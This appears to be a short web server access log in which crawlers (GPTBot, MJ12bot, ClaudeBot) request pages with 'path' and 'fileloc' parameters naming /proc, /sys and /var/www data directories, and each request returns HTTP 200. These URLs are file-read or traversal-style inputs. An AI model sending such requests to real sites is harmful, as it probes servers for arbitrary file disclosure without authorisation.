74.7.227.189 - - [10/Nov/2025:00:55:15 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/cpu1/driver/cpu0/cache HTTP/1.1" 200 3208 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:55:16 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/comm&path=//proc/664 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:00:55:17 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fmodule%2Fasync_xor%2Fholders%2Fasync_pq%2Fholders%2Fraid456%2Fholders HTTP/1.1" 200 2710 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:00:55:17 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/stat&path=//proc/659 HTTP/1.1" 200 2714 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:55:18 +0000] "GET /199dowi1105.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:55:19 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/cpu0/node0/hugepages HTTP/1.1" 200 3057 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
